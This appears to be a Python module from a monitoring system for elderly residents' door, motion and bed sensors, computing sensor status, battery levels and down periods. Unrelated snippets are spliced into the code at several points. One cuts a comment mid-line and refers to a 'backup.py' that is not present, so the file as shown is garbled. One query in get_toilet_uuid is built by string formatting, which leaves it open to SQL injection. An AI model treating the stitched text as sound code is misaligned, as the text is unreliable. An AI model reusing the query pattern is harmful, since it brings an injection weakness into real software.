DAOs.sensor_DAO import sensor_DAO\nfrom DAOs.sysmon_log_DAO import sysmon_log_DAO\nfrom DAOs.sensor_log_DAO import sensor_log_DAO\n\nclass Sensor_mgmt(object):\n\n # RETURN STATUS CODES\n INVALID_SENSOR = -1\n OK = 0 # Can be OK and 
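# (backup.py above names each backup file after the MD5 of the target path,
# which keeps one flat backup directory free of path separators; a standalone
# illustration, the path below is just an example:)
import hashlib

def backup_name(target):
    h = hashlib.md5()
    h.update(target.encode('utf-8'))
    return h.hexdigest()               # deterministic 32-char hex name

print(backup_name('/etc/hosts'))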
LOW_BATT at the same time\n DISCONNECTED = 1\n LOW_BATT = 2\n CHECK_WARN = 3 # Potentially down\n\n # SETTINGS\n batt_thresh = 10 # percent\n motion_thresh = 3.5 # hours\n juvo_thresh = 50 # minutes >> Environment Stats >> Difference between reading and API availability\n\n\n @classmethod\n def get_sensor_status(cls, uuid, retBatteryLevel=False):\n '''\n Returns 'up' | 'down' status of sensors.\n For new sensors, Im assuming that at least a single record is sent and thus will trigger true.\n\n Inputs:\n uuid (str)\n retBatteryLevel (boolean)\n\n Return:\n 1. A List of status codes: See class variables\n 2. A list of Battery level\n - None if Juvo\n - Empty if no records found. e.g. Door sensors only send battery level logs when on low battery\n - Single value in %\n i.e. ([1,3], [75])\n i.e. ([1] , []) // Battery or newly installed sensor\n i.e. ([0] , [None]]) // Juvo\n '''\n # AREAS OF IMPROVEMENT\n # 1. Juvo Bed sensor: Warning triggered if no sleep in the past sleep period 9pm-9am. What about if sleep = 1sec? May also be a problem with elderly\n # - Maybe look at the breakdown period would be better >> light, deep, awake that kind of thing\n # 2. What if sensor partially breaks, sysmon sends, but no sensor logs? Dont think this can be detected also\n ret_codes = []\n batt_lvl = None\n\n curr_time = datetime.datetime.now()\n curr_time_m1d = curr_time - datetime.timedelta(days=1)\n\n try: sensor = sensor_DAO.get_sensors(uuid=uuid)[0]\n except IndexError:\n ret_codes.append(cls.INVALID_SENSOR)\n return ret_codes\n uuid = sensor.uuid\n type = sensor.type\n\n isDoor = True if type == \"door\" else False\n isMotion = True if type == \"motion\" else False\n isBed = True if type == \"bed sensor\" else False\n\n #LEGACY -- \"disconnected\" only exists in master students' data set. As this was thrown by gateway\n last_sysmons = sysmon_log_DAO.get_last_sysmon(uuid)\n if len(last_sysmons) > 0:\n if last_sysmons[0].key == \"disconnected\": ret_codes.append(cls.DISCONNECTED)\n\n if isDoor: # DOOR SENSOR\n # Check1: sensor update within 24 hours\n # we are assuming that the door closes at least once a day\n past24hrs_data = sensor_log_DAO.get_logs(uuid=uuid, start_datetime=curr_time_m1d, end_datetime=curr_time)\n if len(past24hrs_data) > 0: ret_codes.append(cls.CHECK_WARN)\n else: ret_codes.append(cls.OK)\n\n\n elif isMotion: # MOTION SENSOR\n last_batt = sysmon_log_DAO.get_last_battery_level(uuid=uuid)\n if last_batt != None:\n batt_update_period = (curr_time - last_batt.recieved_timestamp).total_seconds()\n\n # Check 1: hourly battery update. 
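# (The motion-sensor check here reduces to a staleness test on the newest
# battery sysmon; a standalone sketch whose threshold mirrors
# cls.motion_thresh = 3.5 hours, with example timestamps:)
from datetime import datetime

def motion_status(last_batt_ts, now, thresh_hours=3.5):
    age = (now - last_batt_ts).total_seconds()
    return 'CHECK_WARN' if age > thresh_hours * 3600 else 'OK'

now = datetime(2019, 1, 1, 12, 0)
assert motion_status(datetime(2019, 1, 1, 10, 0), now) == 'OK'         # 2 h old
assert motion_status(datetime(2019, 1, 1, 7, 0), now) == 'CHECK_WARN'  # 5 h old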
aeotec multisensor 6 should send battery level sysmon updates on the hour\n # This may just be Boon Thais' configs\n if batt_update_period > (60 * 60 * cls.motion_thresh): ret_codes.append(cls.CHECK_WARN)\n else: ret_codes.append(cls.OK)\n\n\n elif isBed: # BED SENSOR (JUVO)\n juvo = JuvoAPI()\n # Check 1: Sleep logged within past sleep period 9pm - 9am\n day_timebreak = curr_time.replace(hour=9, minute=0, second=0, microsecond=0)\n night_timebreak = curr_time.replace(hour=21, minute=0, second=0, microsecond=0)\n if curr_time > day_timebreak and curr_time < night_timebreak: # If current time is between 9am and 9pm\n sleeps = juvo.get_total_sleep_by_day(target=sensor.juvo_target, start_date=curr_time_m1d, end_date=curr_time_m1d)\n if len(sleeps) > 0: ret_codes.append(cls.OK) # sleep recorded\n else: ret_codes.append(cls.CHECK_WARN) # no sleep recorded\n\n else:\n ret_codes.append(cls.INVALID_SENSOR)\n\n # Check2: Battery level\n if isMotion or isDoor:\n last_batt = sysmon_log_DAO.get_last_battery_level(uuid=uuid)\n if last_batt != None: # Sysmon batt event found\n batt_lvl = last_batt.event\n if batt_lvl < cls.batt_thresh:\n ret_codes.append(cls.LOW_BATT)\n else: # No Sysmon batt event found, door sensor high batt, or newly installed sensor\n batt_lvl = []\n\n # Return Values\n if retBatteryLevel: return ret_codes, batt_lvl\n else: return ret_codes\n\n\n @classmethod\n def get_all_sensor_status(cls, retBatteryLevel=False):\n '''\n Returns 'up' | 'down' status of ALL sensors.\n\n Inputs:\n retBatteryLevel -- True, return battery level if exists. Default false\n\n Return:\n list of sensors, status codes, and optionally battery levels:\n NOTE: Battery level can be 'None' if no records are found\n\n [ [Sensor.Entity, [Status, Codes, battLVL]],\n [Sensor.Entity, [Status, Codes, None]]...\n ]\n\n See list of status codes\n '''\n # Ret list in form: [[uuid, [status codes], [uuid, [status codes]]]]\n sensor_status = []\n\n # List of all Sensors\n sensors = sensor_DAO.get_sensors()\n\n # Iterate all sensors and get statuss\n for sensor in sensors:\n uuid = sensor.uuid\n status = cls.get_sensor_status(uuid=uuid, retBatteryLevel=retBatteryLevel)\n if retBatteryLevel: sensor_status.append([uuid, status[0], status[1]])\n else: sensor_status.append([uuid, status])\n\n return sensor_status\n\n\n @classmethod\n def get_sensor_status_v2(cls, uuid, retBatteryLevel=False):\n '''\n Returns 'up' | 'down' status of sensors.\n For new sensors, Im assuming that at least a single record is sent and thus will trigger true.\n\n Inputs:\n uuid (str)\n retBatteryLevel (boolean)\n\n Return:\n 1. A List of status codes: See class variables\n 2. A list of Battery level\n - None if Juvo\n - Empty if no records found. e.g. Door sensors only send battery level logs when on low battery\n - Single value in %\n i.e. ([1,3], [75])\n i.e. ([1] , []) // Battery or newly installed sensor\n i.e. ([0] , [None]]) // Juvo\n '''\n # AREAS OF IMPROVEMENT\n # 1. Juvo Bed sensor: Warning triggered if no sleep in the past sleep period 9pm-9am. What about if sleep = 1sec? May also be a problem with elderly\n # - Maybe look at the breakdown period would be better >> light, deep, awake that kind of thing\n # 2. What if sensor partially breaks, sysmon sends, but no sensor logs? 
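# (The per-type if/elif branching in get_sensor_status_v2 just below can also
# be read as a dispatch table; the handlers here are stand-ins, not the real
# class methods:)
handlers = {
    'door':       lambda uuid: ['door status for ' + uuid],
    'motion':     lambda uuid: ['motion status for ' + uuid],
    'bed sensor': lambda uuid: ['bed status for ' + uuid],
}

def status_for(sensor_type, uuid, INVALID_SENSOR=-1):
    handler = handlers.get(sensor_type)
    return handler(uuid) if handler else [INVALID_SENSOR]

assert status_for('unknown', 'abc')[0] == -1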
Don't think this can be detected either\n        ret_codes = []\n        batt_lvl = None\n\n        curr_time = datetime.datetime.now()\n        curr_time_m1d = curr_time - datetime.timedelta(days=1)\n\n        try: sensor = sensor_DAO.get_sensors(uuid=uuid)[0]\n        except IndexError:\n            ret_codes.append(cls.INVALID_SENSOR)\n            return ret_codes\n        uuid = sensor.uuid\n        type = sensor.type\n\n        isDoor = True if type == \"door\" else False\n        isMotion = True if type == \"motion\" else False\n        isBed = True if type == \"bed sensor\" else False\n\n        #LEGACY -- \"disconnected\" only exists in the master students' data set, as this was thrown by the gateway\n        last_sysmons = sysmon_log_DAO.get_last_sysmon(uuid)\n        if len(last_sysmons) > 0:\n            if last_sysmons[0].key == \"disconnected\": ret_codes.append(cls.DISCONNECTED)\n\n        if isDoor:      # DOOR SENSOR\n            return cls.get_curr_status_door(uuid=uuid, retBatteryLevel=retBatteryLevel)\n\n        elif isMotion:   # MOTION SENSOR\n            return cls.get_curr_status_motion(uuid=uuid, retBatteryLevel=retBatteryLevel)\n\n        elif isBed:    # BED SENSOR (JUVO)\n            return cls.get_curr_status_juvo(target=sensor.juvo_target)\n\n        else:\n            ret_codes.append(cls.INVALID_SENSOR)\n            return ret_codes\n\n\n    @classmethod\n    def get_all_sensor_status_v2(cls, retBatteryLevel=False):\n        '''\n        Returns 'up' | 'down' status of ALL sensors.\n\n        Inputs:\n            retBatteryLevel -- True, return battery level if exists. Default false\n\n        Return:\n            list of sensors, status codes, and optionally battery levels:\n            NOTE: Battery level can be 'None' if no records are found\n\n            [ [Sensor.Entity, [Status, Codes, battLVL]],\n              [Sensor.Entity, [Status, Codes, None]]...\n            ]\n\n            See list of status codes\n        '''\n        # Ret list in form: [[uuid, [status codes], [uuid, [status codes]]]]\n        sensor_status = []\n\n        # List of all Sensors\n        sensors = sensor_DAO.get_sensors()\n\n        # Iterate all sensors and get status\n        for sensor in sensors:\n            uuid = sensor.uuid\n            status = cls.get_sensor_status_v2(uuid=uuid, retBatteryLevel=retBatteryLevel)\n            if retBatteryLevel: sensor_status.append([uuid, status[0], status[1]])\n            else: sensor_status.append([uuid, status])\n\n        return sensor_status\n\n\n    @classmethod\n    def get_down_periods_motion(cls, uuid, start_dt, end_dt):\n        '''\n        Checks if readings during `start_dt` to `end_dt` can be trusted, i.e.\n        if we can confirm the sensor is ON during the period\n\n        INPUTS\n        uuid     (str)\n        start_dt (datetime)\n        end_dt   (datetime)\n\n        RETURNS:\n        list of periods where sensor CANNOT be trusted: [(start_dt, end_dt), ...]\n        if empty, period can be trusted\n        '''\n        # Expand the period by motion_thresh hours on each side, before start_dt and after end_dt\n        # This is to gather the sysmon battery updates\n        start_dt_buff = start_dt - timedelta(hours=cls.motion_thresh)\n        end_dt_buff = end_dt + timedelta(hours=cls.motion_thresh)\n\n        # get all sysmon battery readings within start_dt and end_dt\n        records = sysmon_log_DAO.get_logs(uuid=uuid, key=Sysmon_Log.key_battery, start_dt=start_dt_buff, end_dt=end_dt_buff, descDT=False, limit=0)\n        # CHECK 1: If no records are found, consider the sensor down for the whole period\n        if records == None:    return [(start_dt, end_dt)]\n        if len(records) == 0:  return [(start_dt, end_dt)]\n\n        # CHECK 2: sysmon battery updates >> hourly sysmon battery updates are ASSURED\n        down_periods = []\n\n        # >> Corner case: the period given is current and only 1 batt sysmon can be found before it\n        # >> Return no down periods if the diff has been less than the threshold, i.e. 
assume still up\n        if len(records) == 1:\n            curr_ts = records[0][Sysmon_Log.recieved_timestamp_tname]\n            if curr_ts < start_dt and (start_dt-curr_ts) < timedelta(hours=cls.motion_thresh): return []\n\n        prev_ts = None\n        for i in range(0, len(records)):    # Greedy\n\n            # Initial assignment\n            curr_ts = records[i][Sysmon_Log.recieved_timestamp_tname]\n            if prev_ts == None:\n                prev_ts = curr_ts\n                continue\n\n            # Nothing wrong >> update was within the threshold (1 hour + buffer)\n            if (curr_ts - prev_ts) / timedelta(minutes=1) <= (60 * cls.motion_thresh):\n                prev_ts = curr_ts\n                continue\n\n            # Something wrong >> update exceeded the threshold. There is a missing battery update\n            pred_missing = prev_ts + timedelta(hours=1)\n\n            # >> The assumption here is that there will never be a period where the sensor revives and sends a reading without a sysmon battery update\n            # >> Therefore if the sensor is brought back up, it sends a sysmon battery update soon after\n            enc_logs = Sensor_mgmt.get_enclosing_logs(start_dt=prev_ts, end_dt=curr_ts, target_dt=pred_missing)\n            # ^ last reading before and first reading after (sensor and sysmon) the predicted missing battery update\n\n            if len(enc_logs) == 0: down_periods.append([prev_ts, curr_ts])\n            if len(enc_logs) == 2: down_periods.append([enc_logs[0], enc_logs[1]])\n            if len(enc_logs) == 1:\n                if enc_logs[0] < pred_missing: down_periods.append([enc_logs[0], curr_ts])\n                if enc_logs[0] > pred_missing: down_periods.append([prev_ts, enc_logs[0]])\n\n            # shift down 1\n            prev_ts = curr_ts\n\n        return down_periods\n\n\n    @classmethod\n    def get_curr_status_motion(cls, uuid, retBatteryLevel=False):\n        '''\n        Returns list of status codes. See class vars\n\n        Inputs:\n            uuid (str)\n        '''\n        # Get down periods\n        now = datetime.datetime.now()\n        down_periods = cls.get_down_periods_motion(uuid=uuid, start_dt=now, end_dt=now)\n        ret_codes = []\n        down = False\n        for p in down_periods:      # Check if current time is within a down period\n            # print(p)\n            if p[0] <= now and now <= p[1]:\n                down = True\n                break\n        ret_codes.append(cls.CHECK_WARN if down else cls.OK)\n\n        # Battery level?\n        if retBatteryLevel == False: return ret_codes\n        else:\n            batt_lvl = []\n            last_batt = sysmon_log_DAO.get_last_battery_level(uuid=uuid)\n            if last_batt != None:   # Sysmon batt event found\n                batt_lvl.append(last_batt.event)\n                if last_batt.event < cls.batt_thresh:\n                    ret_codes.append(cls.LOW_BATT)\n            return ret_codes, batt_lvl\n\n\n    @classmethod\n    def get_enclosing_logs(cls, start_dt, end_dt, target_dt):\n        '''\n        Given a target datetime, returns...\n        Last record (sysmon or sensor reading) before the target and first record after the target\n\n        Inputs:\n            start_dt  (datetime)\n            end_dt    (datetime)\n            target_dt (datetime)\n\n        Returns:\n            [before_dt, after_dt]\n            NOTE: dts can be None, meaning no records during that period\n        '''\n        enc_sensor = sensor_log_DAO.get_enclosing_logs(start_dt=start_dt, end_dt=end_dt, target_dt=target_dt)   # Sensor readings: 1st before target, 1st after target\n        enc_sysmon = sysmon_log_DAO.get_enclosing_logs(start_dt=start_dt, end_dt=end_dt, target_dt=target_dt)   # Sysmon readings: 1st before target, 1st after target\n\n        enc_logs = [None, None]\n        if   enc_sensor[0] == None and enc_sysmon[0] != None: enc_logs[0] = enc_sysmon[0]\n        elif enc_sensor[0] != None and enc_sysmon[0] == None: enc_logs[0] = enc_sensor[0]\n        elif enc_sensor[0] < enc_sysmon[0]:  enc_logs[0] = enc_sysmon[0]\n        else: enc_logs[0] = enc_sensor[0]\n\n        if   enc_sensor[1] == None and enc_sysmon[1] != None: enc_logs[1] = enc_sysmon[1]\n        elif enc_sensor[1] != None and enc_sysmon[1] == None: enc_logs[1] = 
enc_sensor[1]\n        elif enc_sensor[1] < enc_sysmon[1]:  enc_logs[1] = enc_sensor[1]\n        else: enc_logs[1] = enc_sysmon[1]\n\n        return enc_logs\n\n\n    @classmethod\n    def get_down_periods_Juvo(cls, target, start_dt, end_dt):\n        '''\n        Returns the down periods for Juvo Bed sensors\n        Logic is based on the Environment readings, which should be read in continuous 5 minute windows\n\n        Inputs:\n            target   (int)\n            start_dt (datetime)\n            end_dt   (datetime)\n\n        Returns:\n            list -- [[start,end], ...]\n        '''\n        readings = JuvoAPI.get_target_environ_stats(target=target, start_time=start_dt, end_time=end_dt)\n\n        # No readings, therefore all down\n        if readings == None: return [[start_dt, end_dt]]\n\n        logs = readings['data']['stats']\n        logs.sort(key=lambda x: parser.parse(x['local_start_time']))    # Sorted in increasing time order\n\n        down_periods = []\n        prev_sdt = None\n        prev_edt = None\n        for log in logs:\n            curr_sdt = parser.parse(log['local_start_time']).replace(tzinfo=None)\n            curr_edt = parser.parse(log['local_end_time']).replace(tzinfo=None)\n\n            # Initial assignment\n            if prev_sdt==None and prev_edt==None:\n                prev_sdt = curr_sdt\n                prev_edt = curr_edt\n                continue\n\n            # Periods not continuous\n            if (curr_sdt - prev_edt) > timedelta(minutes=10):\n                down_periods.append([prev_edt, curr_sdt])\n\n            prev_sdt = curr_sdt\n            prev_edt = curr_edt\n\n        # Deal with last log - curr time\n        # Find the previous 5 divisible minute (when environ stats should have sent data)\n        edt = datetime.datetime.now()\n        edt = edt.replace(minute=(math.floor(edt.minute / 5) * 5), second=0, microsecond=0)\n        cutoff = edt - timedelta(minutes=cls.juvo_thresh)   # lag between data reading and availability on the API\n        if cutoff - prev_edt > timedelta(minutes=cls.juvo_thresh):  # Difference > lag thresh, therefore it is down, not just lagging\n            down_periods.append([prev_edt, cutoff])\n\n        return down_periods\n\n\n    @classmethod\n    def get_curr_status_juvo(cls, target):\n        '''\n        Returns status of Juvo Bed sensor based on last received environment statistic\n        if last received was > threshold mins, then return down.\n\n        target (int)\n        '''\n        # Get all environ readings for past 1 hour\n        end_dt = datetime.datetime.now()   # Also the current time\n        start_dt = end_dt - timedelta(hours=1)\n        readings = JuvoAPI.get_target_environ_stats(target=target, start_time=start_dt, end_time=end_dt)\n\n        ret_codes = []\n        if readings == None: ret_codes.append(cls.CHECK_WARN)   # No readings, therefore down\n        elif len(readings['data']['stats']) == 0: ret_codes.append(cls.CHECK_WARN)\n        else:\n            # Compare last reading with current time, against threshold\n            logs = readings['data']['stats']\n            if(len(logs) > 0):\n                logs.sort(key=lambda x: parser.parse(x['local_start_time']))    # Sorted in increasing time order\n                last_log = logs[-1]\n                last_log_edt = parser.parse(last_log['local_end_time']).replace(tzinfo=None)\n\n                time_since_update = end_dt - last_log_edt\n                if time_since_update > timedelta(minutes=cls.juvo_thresh): ret_codes.append(cls.CHECK_WARN)\n                else: ret_codes.append(cls.OK)\n            else:\n                ret_codes.append(cls.CHECK_WARN)\n\n        return ret_codes, []\n\n    @classmethod\n    def get_down_periods_door(cls, uuid, start_dt, end_dt):\n        '''\n        Returns the down periods for the door sensor\n        NOTE: down/up can only be assigned on a daily/24 hour basis, hard to get more accurate than that\n\n        Inputs:\n            uuid     (str)\n            start_dt (datetime) -- Inclusive\n            end_dt   (datetime) -- Inclusive\n\n        Return\n            List of down time: [[start,end]...]\n        '''\n\n        # Split into periods whereby the 10th would refer to 12pm 9th, to 12pm 10th\n        start_date = start_dt.replace(hour=0, 
minute=0, second=0) - timedelta(days=1)   # Expand by 1 day, in case start and end are the same day\n        end_date = end_dt.replace(hour=0, minute=0, second=0)\n\n        # Get all sensor logs of this uuid between start and end dates\n        logs = sensor_log_DAO.get_logs(uuid=uuid, start_datetime=start_date, end_datetime=end_date)\n        logs.sort(key = lambda x: x.recieved_timestamp)     # ASC\n\n        # Treat bathroom and main door differently\n        location = sensor_DAO.get_sensors(uuid=uuid)[0].location\n        if location == \"toilet\":\n            if logs == None or len(logs) == 0:  # No readings since, send warning\n                return [[start_date.replace(hour=0, minute=0), end_date.replace(hour=23, minute=59)]]\n            else: return []\n\n        # if no records, consider down\n        if len(logs) == 0:\n            missing_dates = [start_date]\n        else:\n            # Find dates without logs\n            logs_d_only = [l.recieved_timestamp.replace(hour=0, minute=0, microsecond=0) for l in logs]\n            min_log_dt = logs_d_only[0]\n            max_log_dt = logs_d_only[-1]\n            full_cal = set(min_log_dt + timedelta(x) for x in range((max_log_dt - min_log_dt).days))   # All dates between start and end\n            missing_dates = sorted(full_cal - set(logs_d_only))\n\n        # Slice out dates with no owner\n        ownership = sensor_DAO.get_ownership_hist(uuid=uuid, start_dt=start_dt, end_dt=end_dt)\n        min_dt = max_dt = datetime.datetime.now()\n        for p in ownership[uuid]:\n            if p[1] != None and (p[1] < min_dt): min_dt = p[1].replace(hour=0, minute=0, microsecond=0)\n            if p[2] != None and (p[2] > max_dt): max_dt = p[2].replace(hour=0, minute=0, microsecond=0)\n\n        ownerless = []\n        if min_dt > start_dt: ownerless += [start_dt + timedelta(x) for x in range((min_dt - start_dt).days)]\n        if max_dt < end_dt:   ownerless += [max_dt + timedelta(x) for x in range((end_dt - max_dt).days)]\n        missing_dates = sorted(set(missing_dates) - set(ownerless))\n\n        # Fine-tune periods without logs; it may just be the case that no one uses the door at all\n        # Assumption: residents sleep with doors closed. Therefore use Juvo to fine-tune\n        down_periods = []\n        for missing in missing_dates:\n            missing_end = missing.replace(hour=12)\n            missing_start = missing_end - timedelta(days=1)\n\n            # Get owner by period\n            door_ownership = sensor_DAO.get_ownership_hist(uuid=uuid, start_dt=missing_start, end_dt=missing_end)\n            rid_owners = [v[0][0] for k,v in door_ownership.items()]\n\n            # Get Juvo owner by period ERROR HERE MAKE NEW QUERY\n            juvo_ownership = sensor_DAO.get_ownership_hist(start_dt=missing_start, end_dt=missing_end, type=\"bed sensor\")\n            juvo_uuid = None\n            for k,v in juvo_ownership.items():\n                if v[0][0] in rid_owners:\n                    juvo_uuid = k\n                    break\n\n            if juvo_uuid == None:   # This resident didn't own a bed sensor this day\n                down_periods.append([missing.replace(hour=0, minute=0), missing.replace(hour=23, minute=59)])\n\n            if juvo_uuid != None:   # Attempt to find if owner slept this period\n                target = None\n                for s in sensor_DAO.get_sensors(uuid=juvo_uuid):\n                    target = s.juvo_target\n                    break\n\n                if target == None:  # This resident didn't own a bed sensor this day\n                    down_periods.append([missing.replace(hour=0, minute=0), missing.replace(hour=23, minute=59)])\n\n                # Check if sleep was detected\n                juvo_offset_dt = missing - timedelta(days=1)    # i.e. Sleep for 10th = 10th 12pm to 11th 12pm\n                records = JuvoAPI.get_target_sleep_summaries(target, juvo_offset_dt, juvo_offset_dt)['sleep_summaries']\n                for r in records:\n                    total_sleep = r['light'] + r['deep'] + r['awake']\n                    if total_sleep > 0:     # Sleep detected, no door detected. 
assume the door is down\n                        down_periods.append([missing.replace(hour=0, minute=0), missing.replace(hour=23, minute=59)])\n        return down_periods\n\n\n    @classmethod\n    def get_curr_status_door(cls, uuid, retBatteryLevel=False):\n        '''\n        Returns list of status codes. See class vars\n\n        Inputs:\n            uuid (str)\n        '''\n        # Get down periods\n        now = datetime.datetime.now()\n        down_periods = cls.get_down_periods_door(uuid=uuid, start_dt=now, end_dt=now)\n\n        ret_codes = []\n        down = False\n        for p in down_periods:      # Check if current time is within a down period\n            # print(p)\n            if p[0] <= now and now <= p[1]:\n                down = True\n                break\n        ret_codes.append(cls.CHECK_WARN if down else cls.OK)\n\n        # Battery level?\n        if retBatteryLevel == False: return ret_codes\n        else:\n            batt_lvl = []\n            last_batt = sysmon_log_DAO.get_last_battery_level(uuid=uuid)\n            if last_batt != None:   # Sysmon batt event found\n                batt_lvl.append(last_batt.event)\n                if last_batt.event < cls.batt_thresh:\n                    ret_codes.append(cls.LOW_BATT)\n            return ret_codes, batt_lvl\n\n\n    JUVO_SLEEP = 1      # Someone was sleeping\n    JUVO_NOONE = 0      # No one slept\n    JUVO_DOWN  = -1     # There is no way to know if anyone slept or not, so just scrub the entire period as down\n    @classmethod\n    def check_sleep_noone_down_juvo(cls, target, date):\n        '''\n        Utility method to investigate the reason for a missing date (i.e. no sleep_summary readings from sensor)\n        NOTE: Will return weird results if given a date that has readings\n\n        Inputs:\n            target (int)\n            date   (datetime) -- Sleep period for 12th considers 12th noon - 13th noon\n\n        Returns:\n            JUVO_SLEEP = 1  -- Sleep was recorded that night\n            JUVO_NOONE = 0  -- Probably no one slept that night\n            JUVO_DOWN  = -1 -- Sensor is down during that date\n        '''\n\n        # Juvo looks at the night after, but we want to look at the night before\n        prev_date = date - timedelta(days=1)          # 12 am of 1 day before date\n        end_dt = date.replace(hour=12)                # 12 noon of date\n        start_dt = end_dt - timedelta(days=1)         # 12 noon of 1 day before date\n\n        sleep_summaries = JuvoAPI.get_target_sleep_summaries(target=target, start_date=prev_date, end_date=prev_date)\n        down_periods = cls.get_down_periods_Juvo(target=target, start_dt=start_dt, end_dt=end_dt)\n\n        if sleep_summaries != None: return cls.JUVO_SLEEP     # C1: If sleep summaries found, then JUVO_SLEEP\n        elif len(down_periods) == 0: return cls.JUVO_NOONE    # C2: If no sleep summaries found, AND 0 down periods, then JUVO_NOONE\n        else: return cls.JUVO_DOWN                            # C3: If no sleep summaries found, AND any down period: JUVO_DOWN\n\n    @classmethod\n    def get_toilet_uuid(cls, resident_id):\n        '''\n        WARNING: quick-and-dirty method added as a mid-terms quick fix\n        returns the active uuid (str) for the current input resident_id (int)\n        '''\n        factory = connection_manager()\n        connection = factory.connection\n        cursor = connection.cursor()\n        output = None\n        query = f\"SELECT uuid FROM stbern.sensor_ownership_hist WHERE resident_id = {resident_id} AND period_end IS NULL AND uuid LIKE '%m-02'\"\n        try:\n            cursor.execute(query)\n            result = cursor.fetchone()\n\n            if result:\n                output = result['uuid']\n        except Exception as e:\n            print(e)\n\n        return output\n\n# TESTS ======================================================================================\nif __name__ == '__main__':\n\n    # # Room 1\n    # print(\"================ ROOM 1 ================\")\n    # uuid = \"2005-m-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2005-m-02\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2005-d-01\"\n    # print(f\"Testing UUID: {uuid}, Status: 
{Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2005-d-02\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2005-j-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # # Room 2\n    # print(\"================ ROOM 2 ================\")\n    # uuid = \"2006-m-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2006-m-02\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2006-d-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2006-d-02\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2006-j-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # # Room 3\n    # print(\"================ ROOM 3 ================\")\n    # uuid = \"2100-room 3-m-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2100-room 3-m-02\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2100-room 3-d-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2100-room 3-j-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # # Room 4\n    # print(\"================ ROOM 4 ================\")\n    # uuid = \"2100-room 4-m-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2100-room 4-m-02\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # uuid = \"2100-room 4-d-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # # ADAM\n    # print(\"================ ADAM ROAD ================\")\n    # uuid = \"2100-room 4-m-01\"\n    # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n    # All\n    # print(\"=============== ALL SENSORS ==============\")\n    # for ss in Sensor_mgmt.get_all_sensor_status(retBatteryLevel=True):\n    #     print(ss)\n\n    # for ss in Sensor_mgmt.get_all_sensor_status(retBatteryLevel=False):\n    #     print(ss)\n\n    # ================== UP / DOWN ==================\n    uuid = \"2005-m-02\"\n    target = 460\n    sdt = datetime.datetime(year=2018, month=3, day=2)\n    edt = datetime.datetime(year=2018, month=10, day=5)\n\n    # # MOTION =======================================\n    # print(\"MOTION ===================================\")\n    # print(\"===== Down Periods =====\")\n    # down_periods = Sensor_mgmt.get_down_periods_motion(uuid=uuid, start_dt=sdt, end_dt=edt)\n    # for p in down_periods: print(p)\n    # print(f\"Curr status: \", Sensor_mgmt.get_curr_status_motion(uuid=uuid, retBatteryLevel=True))\n\n    # JUVO =============================================\n    # sdt = datetime.datetime(year=2018, month=9, day=19, hour=12) # Target installation pains\n    # edt = datetime.datetime(year=2018, month=9, day=19, hour=16) # Target installation pains\n    # sdt = datetime.datetime(year=2018, month=3, day=2)  # MIN\n    # edt = datetime.datetime(year=2018, month=10, day=5) # MAX\n    # print(\"JUVO ===================================\")\n    # print(\"===== Down Periods =====\")\n    # down_periods = Sensor_mgmt.get_down_periods_Juvo(target, sdt, edt)\n    # for p in down_periods: print(p)\n    # print(f\"Curr status: \", Sensor_mgmt.get_curr_status_juvo(target=target))\n\n\n    # DOOR 
=============================================\n    # uuid = \"2006-d-01\"\n    # print(\"DOOR ===================================\")\n    # print(\"===== Down Periods =====\")\n    # down_periods = Sensor_mgmt.get_down_periods_door(uuid, sdt, edt)\n    # for p in down_periods: print(p)\n    # print(\"periods done\")\n    # print(f\"Curr status: \", Sensor_mgmt.get_curr_status_door(uuid=uuid, retBatteryLevel=True))\n\n    # ALL ==============================================\n    print(\"ALL =====================================\")\n    start = time.perf_counter()\n    for status in Sensor_mgmt.get_all_sensor_status_v2(retBatteryLevel=True):\n        print(status)\n    print(\"time taken: \", time.perf_counter() - start)\n","sub_path":"web/sensor_mgmt/sensor_mgmt.py","file_name":"sensor_mgmt.py","file_ext":"py","file_size_in_byte":32421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
